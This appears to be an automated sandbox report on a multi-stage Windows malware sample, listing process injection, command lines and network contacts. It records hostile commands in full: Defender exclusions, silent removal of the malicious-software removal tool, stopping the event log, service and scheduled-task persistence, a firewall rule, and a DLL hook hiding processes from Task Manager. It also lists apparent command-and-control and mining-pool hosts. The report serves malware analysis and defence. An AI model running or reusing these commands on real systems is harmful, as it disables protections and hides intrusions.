PID 3512 wrote to memory of 2248 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC25.exe
PID 3512 wrote to memory of 2248 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC25.exe
PID 3512 wrote to memory of 2248 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC25.exe
PID 3512 wrote to memory of 1116 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3512 wrote to memory of 1116 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1116 wrote to memory of 4856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1116 wrote to memory of 4856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1116 wrote to memory of 4856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3512 wrote to memory of 924 N/A N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 3512 wrote to memory of 924 N/A N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 3512 wrote to memory of 924 N/A N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 3512 wrote to memory of 4028 N/A N/A C:\Users\Admin\AppData\Local\Temp\FACE.exe
PID 3512 wrote to memory of 4028 N/A N/A C:\Users\Admin\AppData\Local\Temp\FACE.exe
PID 3512 wrote to memory of 4028 N/A N/A C:\Users\Admin\AppData\Local\Temp\FACE.exe
PID 3512 wrote to memory of 2868 N/A N/A C:\Users\Admin\AppData\Local\Temp\723.exe
PID 3512 wrote to memory of 2868 N/A N/A C:\Users\Admin\AppData\Local\Temp\723.exe
PID 3512 wrote to memory of 2868 N/A N/A C:\Users\Admin\AppData\Local\Temp\723.exe
PID 2868 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\723.exe C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp
PID 2868 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\723.exe C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp
PID 2868 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\723.exe C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp
PID 3588 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe
PID 3588 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe
PID 3588 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe
PID 3588 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe
PID 3588 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe
PID 3588 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe
PID 3512 wrote to memory of 5104 N/A N/A C:\Users\Admin\AppData\Local\Temp\375C.exe
PID 3512 wrote to memory of 5104 N/A N/A C:\Users\Admin\AppData\Local\Temp\375C.exe
PID 3512 wrote to memory of 5104 N/A N/A C:\Users\Admin\AppData\Local\Temp\375C.exe
PID 3512 wrote to memory of 2020 N/A N/A C:\Users\Admin\AppData\Local\Temp\4901.exe
PID 3512 wrote to memory of 2020 N/A N/A C:\Users\Admin\AppData\Local\Temp\4901.exe
PID 3512 wrote to memory of 2020 N/A N/A C:\Users\Admin\AppData\Local\Temp\4901.exe
PID 5104 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 5104 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 5104 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 5104 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 5104 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 5104 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 5104 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 5104 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 3228 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 3228 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 3228 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 3228 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp
PID 3228 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp
PID 3228 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp
PID 4432 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 4432 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 4432 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3208 wrote to memory of 4452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3208 wrote to memory of 4452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3208 wrote to memory of 4452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3512 wrote to memory of 4816 N/A N/A C:\Users\Admin\AppData\Local\Temp\70AE.exe
PID 3512 wrote to memory of 4816 N/A N/A C:\Users\Admin\AppData\Local\Temp\70AE.exe
PID 3512 wrote to memory of 4816 N/A N/A C:\Users\Admin\AppData\Local\Temp\70AE.exe
PID 3208 wrote to memory of 3900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe

"C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe"

C:\Users\Admin\AppData\Local\Temp\EC25.exe

C:\Users\Admin\AppData\Local\Temp\EC25.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\F231.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\F231.dll

C:\Users\Admin\AppData\Local\Temp\F84C.exe

C:\Users\Admin\AppData\Local\Temp\F84C.exe

C:\Users\Admin\AppData\Local\Temp\F84C.exe

C:\Users\Admin\AppData\Local\Temp\F84C.exe

C:\Users\Admin\AppData\Local\Temp\FACE.exe

C:\Users\Admin\AppData\Local\Temp\FACE.exe

C:\Users\Admin\AppData\Local\Temp\723.exe

C:\Users\Admin\AppData\Local\Temp\723.exe

C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp" /SL5="$D002C,2424585,54272,C:\Users\Admin\AppData\Local\Temp\723.exe"

C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe

"C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe" -i

C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe

"C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe" -s

C:\Users\Admin\AppData\Local\Temp\375C.exe

C:\Users\Admin\AppData\Local\Temp\375C.exe

C:\Users\Admin\AppData\Local\Temp\4901.exe

C:\Users\Admin\AppData\Local\Temp\4901.exe

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp

C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Users\Admin\AppData\Local\Temp\70AE.exe

C:\Users\Admin\AppData\Local\Temp\70AE.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2084 -ip 2084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1956

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "UTIXDCVF"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "UTIXDCVF"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 selebration17io.io udp
RU 91.215.85.120:80 selebration17io.io tcp
US 8.8.8.8:53 120.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 resergvearyinitiani.shop udp
US 104.21.94.2:443 resergvearyinitiani.shop tcp
US 8.8.8.8:53 2.94.21.104.in-addr.arpa udp
US 8.8.8.8:53 technologyenterdo.shop udp
US 104.21.80.118:443 technologyenterdo.shop tcp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 8.8.8.8:53 118.80.21.104.in-addr.arpa udp
US 8.8.8.8:53 detectordiscusser.shop udp
US 104.21.60.92:443 detectordiscusser.shop tcp
US 8.8.8.8:53 92.60.21.104.in-addr.arpa udp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
US 8.8.8.8:53 joly.bestsup.su udp
US 172.67.171.112:80 joly.bestsup.su tcp
US 104.21.76.253:443 turkeyunlikelyofw.shop tcp
US 8.8.8.8:53 associationokeo.shop udp
US 172.67.147.18:443 associationokeo.shop tcp
US 8.8.8.8:53 112.171.67.172.in-addr.arpa udp
US 8.8.8.8:53 253.76.21.104.in-addr.arpa udp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 18.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
RU 213.158.31.231:22711 tcp
DE 185.220.101.22:30022 tcp
US 8.8.8.8:53 trmpc.com udp
MX 189.232.56.10:80 trmpc.com tcp
CA 149.56.98.216:9001 tcp
US 8.8.8.8:53 10.56.232.189.in-addr.arpa udp
LV 195.123.209.91:5092 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
DE 185.172.128.127:80 185.172.128.127 tcp
US 8.8.8.8:53 127.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 104.21.94.2:443 resergvearyinitiani.shop tcp
US 104.21.80.118:443 technologyenterdo.shop tcp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 104.21.60.92:443 detectordiscusser.shop tcp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 104.21.76.253:443 turkeyunlikelyofw.shop tcp
US 172.67.147.18:443 associationokeo.shop tcp
DE 185.172.128.145:80 185.172.128.145 tcp
US 8.8.8.8:53 145.128.172.185.in-addr.arpa udp
DE 185.220.101.145:10145 tcp
US 154.35.175.225:443 tcp
N/A 127.0.0.1:58864 tcp
US 8.8.8.8:53 145.101.220.185.in-addr.arpa udp
BR 143.107.229.210:42256 tcp
DE 131.188.40.189:443 tcp
US 8.8.8.8:53 189.40.188.131.in-addr.arpa udp
DE 37.221.196.71:443 tcp
DE 141.147.45.13:443 tcp
US 8.8.8.8:53 13.45.147.141.in-addr.arpa udp
US 8.8.8.8:53 71.196.221.37.in-addr.arpa udp
AT 5.42.64.33:80 5.42.64.33 tcp
US 8.8.8.8:53 33.64.42.5.in-addr.arpa udp
DE 37.221.196.71:443 tcp
DE 141.147.45.13:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
PL 51.68.137.186:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 186.137.68.51.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 kamsmad.com udp
MX 187.204.68.217:80 kamsmad.com tcp
US 8.8.8.8:53 217.68.204.187.in-addr.arpa udp
MX 187.204.68.217:80 kamsmad.com tcp
MX 187.204.68.217:80 kamsmad.com tcp
MX 187.204.68.217:80 kamsmad.com tcp
N/A 127.0.0.1:20428 tcp
MX 187.204.68.217:80 kamsmad.com tcp
MX 187.204.68.217:80 kamsmad.com tcp
MX 187.204.68.217:80 kamsmad.com tcp
US 8.8.8.8:53 9b6112bf-4703-435e-a986-e508b6e797a0.uuid.statsexplorer.org udp
MX 187.204.68.217:80 kamsmad.com tcp
MX 187.204.68.217:80 kamsmad.com tcp
MX 187.204.68.217:80 kamsmad.com tcp
US 8.8.8.8:53 bocapaverseal.com udp
US 8.8.8.8:53 britches-peru.com udp
US 162.0.209.83:443 bocapaverseal.com tcp
US 8.8.8.8:53 onepercentmindsetof.com udp
US 8.8.8.8:53 onesentencepolitics.com udp
US 198.54.126.63:80 britches-peru.com tcp
US 8.8.8.8:53 projectsaudeebeleza.com udp
US 8.8.8.8:53 thepeoplesproject-my.com udp
US 162.241.216.41:443 onesentencepolitics.com tcp
US 192.185.222.207:443 onepercentmindsetof.com tcp
US 8.8.8.8:53 karensonlinemarketing.com udp
US 8.8.8.8:53 cyberworldinformation.com udp
US 192.185.213.241:443 projectsaudeebeleza.com tcp
US 162.241.224.209:443 thepeoplesproject-my.com tcp
US 8.8.8.8:53 dashdeliverylogistics.com udp
US 162.241.218.61:443 karensonlinemarketing.com tcp
US 8.8.8.8:53 deckbuildersinstcloud.com udp
US 8.8.8.8:53 83.209.0.162.in-addr.arpa udp
US 8.8.8.8:53 63.126.54.198.in-addr.arpa udp
US 8.8.8.8:53 207.222.185.192.in-addr.arpa udp
US 8.8.8.8:53 41.216.241.162.in-addr.arpa udp
US 8.8.8.8:53 detectivesprivadosipc.com udp
US 8.8.8.8:53 www.deutsches-ki-institut.de udp
US 89.117.139.252:443 dashdeliverylogistics.com tcp
US 185.150.190.167:80 cyberworldinformation.com tcp
US 8.8.8.8:53 www.discoverytranslations.com udp
US 199.59.243.225:443 deckbuildersinstcloud.com tcp
US 8.8.8.8:53 doingcleaningservices.com udp
US 162.241.61.248:443 detectivesprivadosipc.com tcp
US 8.8.8.8:53 dreduardoacevedoreuma.com udp
DE 85.13.162.216:443 www.deutsches-ki-institut.de tcp
IT 89.46.108.58:443 www.discoverytranslations.com tcp
US 8.8.8.8:53 www.ds-renovation-habitat.com udp
US 8.8.8.8:53 enchantedvisionevents.com udp
US 8.8.8.8:53 energyproviderexperts.com udp
US 165.22.142.86:443 doingcleaningservices.com tcp
US 8.8.8.8:53 essencefurniturestore.com udp
US 8.8.8.8:53 faizonetransportation.com udp
US 8.8.8.8:53 209.224.241.162.in-addr.arpa udp
US 8.8.8.8:53 61.218.241.162.in-addr.arpa udp
US 8.8.8.8:53 241.213.185.192.in-addr.arpa udp
US 8.8.8.8:53 167.190.150.185.in-addr.arpa udp
US 8.8.8.8:53 225.243.59.199.in-addr.arpa udp
US 8.8.8.8:53 252.139.117.89.in-addr.arpa udp
US 8.8.8.8:53 248.61.241.162.in-addr.arpa udp
US 8.8.8.8:53 everythingcooperstown.com udp
US 162.241.61.144:443 dreduardoacevedoreuma.com tcp
US 8.8.8.8:53 flybynightweddingblog.com udp
US 8.8.8.8:53 weltraum.de udp
US 8.8.8.8:53 forumcgeciacademy2023.com udp
US 89.117.139.222:443 enchantedvisionevents.com tcp
US 68.65.122.36:443 essencefurniturestore.com tcp
FR 109.234.162.86:443 www.ds-renovation-habitat.com tcp
US 8.8.8.8:53 www.fullpolymathpotential.com udp
US 198.54.126.155:80 energyproviderexperts.com tcp
US 162.241.253.18:443 flybynightweddingblog.com tcp
US 8.8.8.8:53 fumigacionesartropoda.com udp
US 162.241.123.168:443 faizonetransportation.com tcp
DE 85.13.163.149:443 weltraum.de tcp
US 192.154.227.151:443 everythingcooperstown.com tcp
US 8.8.8.8:53 gagafreightforwarders.com udp
FR 195.154.94.212:443 forumcgeciacademy2023.com tcp
US 8.8.8.8:53 gaiathehomeofportwine.com udp
US 8.8.8.8:53 216.162.13.85.in-addr.arpa udp
US 8.8.8.8:53 58.108.46.89.in-addr.arpa udp
US 8.8.8.8:53 86.142.22.165.in-addr.arpa udp
US 8.8.8.8:53 144.61.241.162.in-addr.arpa udp
US 8.8.8.8:53 86.162.234.109.in-addr.arpa udp
US 8.8.8.8:53 222.139.117.89.in-addr.arpa udp
US 8.8.8.8:53 36.122.65.68.in-addr.arpa udp
US 208.82.114.180:443 gagafreightforwarders.com tcp
US 8.8.8.8:53 global-account-summit.com udp
US 67.205.11.201:443 www.fullpolymathpotential.com tcp
CA 144.217.96.200:443 fumigacionesartropoda.com tcp
US 8.8.8.8:53 www.guyleroy-photographie.com udp
US 8.8.8.8:53 helps4homeimprovement.com udp
PT 176.221.38.101:443 gaiathehomeofportwine.com tcp
NL 160.153.129.24:443 global-account-summit.com tcp
US 8.8.8.8:53 hojalateriavillalobos.co.cr udp
GB 185.77.97.80:443 helps4homeimprovement.com tcp
FR 155.133.142.10:443 www.guyleroy-photographie.com tcp
US 8.8.8.8:53 improvementssolutions.com udp
US 8.8.8.8:53 indianastrologyinutah.com udp
US 8.8.8.8:53 infinityautopartdeals.com udp
US 8.8.8.8:53 thuexesanbaycamranh79.com udp
US 8.8.8.8:53 tierodreplacementcost.com udp
US 8.8.8.8:53 threadsvideodownloads.com udp
US 8.8.8.8:53 inmopremiumproperties.com udp
US 8.8.8.8:53 toogoodforyoueveryday.com udp
US 8.8.8.8:53 149.163.13.85.in-addr.arpa udp
US 8.8.8.8:53 18.253.241.162.in-addr.arpa udp
US 8.8.8.8:53 151.227.154.192.in-addr.arpa udp
US 8.8.8.8:53 168.123.241.162.in-addr.arpa udp
US 8.8.8.8:53 212.94.154.195.in-addr.arpa udp
US 8.8.8.8:53 201.11.205.67.in-addr.arpa udp
US 8.8.8.8:53 180.114.82.208.in-addr.arpa udp
US 8.8.8.8:53 200.96.217.144.in-addr.arpa udp
US 8.8.8.8:53 101.38.221.176.in-addr.arpa udp
US 8.8.8.8:53 top-one-training-room.com udp
US 8.8.8.8:53 torontopsychoanalysis.com udp
US 104.21.74.60:443 hotelmaconmississippi.com tcp
US 75.102.22.59:443 hojalateriavillalobos.co.cr tcp
US 172.67.136.11:443 improvementssolutions.com tcp
US 8.8.8.8:53 ugradnjaklime-beograd.com udp
US 8.8.8.8:53 vacationreviewremover.com udp
GB 154.49.138.105:443 indianastrologyinutah.com tcp
US 8.8.8.8:53 vidasaudaveleradiante.com udp
US 172.67.165.220:443 threadsvideodownloads.com tcp
US 74.208.236.242:443 torontopsychoanalysis.com tcp
TR 83.150.213.229:443 tierodreplacementcost.com tcp
ES 185.136.88.42:443 inmopremiumproperties.com tcp
US 50.116.87.239:443 toogoodforyoueveryday.com tcp
US 8.8.8.8:53 vikingstrongfreelance.com udp
US 8.8.8.8:53 www.vitalitywealthadvisors.com udp
US 8.8.8.8:53 vidasaludablecondiana.com udp
US 195.35.33.234:443 infinityautopartdeals.com tcp
SG 184.168.98.97:80 top-one-training-room.com tcp
VN 103.74.116.222:443 thuexesanbaycamranh79.com tcp
US 8.8.8.8:53 80.97.77.185.in-addr.arpa udp
US 8.8.8.8:53 10.142.133.155.in-addr.arpa udp
US 8.8.8.8:53 155.126.54.198.in-addr.arpa udp
US 8.8.8.8:53 60.74.21.104.in-addr.arpa udp
US 8.8.8.8:53 waterlifetechnologies.com udp
US 198.54.126.155:443 energyproviderexperts.com tcp
US 74.208.236.227:443 vacationreviewremover.com tcp
GB 54.36.166.224:443 ugradnjaklime-beograd.com tcp
US 8.8.8.8:53 weaverglobalmarketing.com udp
US 8.8.8.8:53 whitehousecocainecoin.com udp
US 108.179.192.33:443 vidasaudaveleradiante.com tcp
US 208.113.253.208:443 www.vitalitywealthadvisors.com tcp
US 162.241.226.58:443 vikingstrongfreelance.com tcp
GB 154.49.138.119:443 vidasaludablecondiana.com tcp
US 8.8.8.8:53 www.wiggancreativestudios.com udp
US 8.8.8.8:53 woodendeskaccessories.com udp
US 8.8.8.8:53 yoshimura-houmubucyou.com udp
US 8.8.8.8:53 www.threadsvideodownloads.com udp
US 8.8.8.8:53 yourdigitaltechnician.com udp
US 8.8.8.8:53 zideagroupofcompanies.com udp
US 8.8.8.8:53 11.136.67.172.in-addr.arpa udp
US 8.8.8.8:53 59.22.102.75.in-addr.arpa udp
US 8.8.8.8:53 105.138.49.154.in-addr.arpa udp
US 8.8.8.8:53 220.165.67.172.in-addr.arpa udp
US 8.8.8.8:53 42.88.136.185.in-addr.arpa udp
US 8.8.8.8:53 229.213.150.83.in-addr.arpa udp
US 8.8.8.8:53 239.87.116.50.in-addr.arpa udp
US 8.8.8.8:53 242.236.208.74.in-addr.arpa udp
US 8.8.8.8:53 234.33.35.195.in-addr.arpa udp
US 8.8.8.8:53 222.116.74.103.in-addr.arpa udp
US 8.8.8.8:53 224.166.36.54.in-addr.arpa udp
US 8.8.8.8:53 threads-video-download.com udp
US 192.254.236.78:443 waterlifetechnologies.com tcp
US 104.21.25.40:443 weaverglobalmarketing.com tcp
US 67.212.174.154:443 www.wiggancreativestudios.com tcp
CH 194.191.24.20:443 whitehousecocainecoin.com tcp
PL 195.78.67.65:443 woodendeskaccessories.com tcp
US 172.67.165.220:443 www.threadsvideodownloads.com tcp
US 8.8.8.8:53 torneodeteniscampestre.com udp
US 8.8.8.8:53 www.transmitdispatchingllc.com udp
US 8.8.8.8:53 universodabelezaesaude.com udp
JP 219.94.155.183:80 yoshimura-houmubucyou.com tcp
US 162.254.39.141:443 threads-video-download.com tcp
US 8.8.8.8:53 waynereedyconstruction.com udp
US 172.67.199.198:443 zideagroupofcompanies.com tcp
US 8.8.8.8:53 zeuscosmeticindustries.com udp
US 8.8.8.8:53 www.zonguldakkorogluturizm.com udp
US 162.254.39.115:443 yourdigitaltechnician.com tcp
US 8.8.8.8:53 izmirhealingevdesaglik.com udp
US 8.8.8.8:53 119.138.49.154.in-addr.arpa udp
US 8.8.8.8:53 jcmlandscapingservices.com udp
US 8.8.8.8:53 208.253.113.208.in-addr.arpa udp
US 8.8.8.8:53 58.226.241.162.in-addr.arpa udp
US 8.8.8.8:53 78.236.254.192.in-addr.arpa udp
US 8.8.8.8:53 33.192.179.108.in-addr.arpa udp
US 8.8.8.8:53 40.25.21.104.in-addr.arpa udp
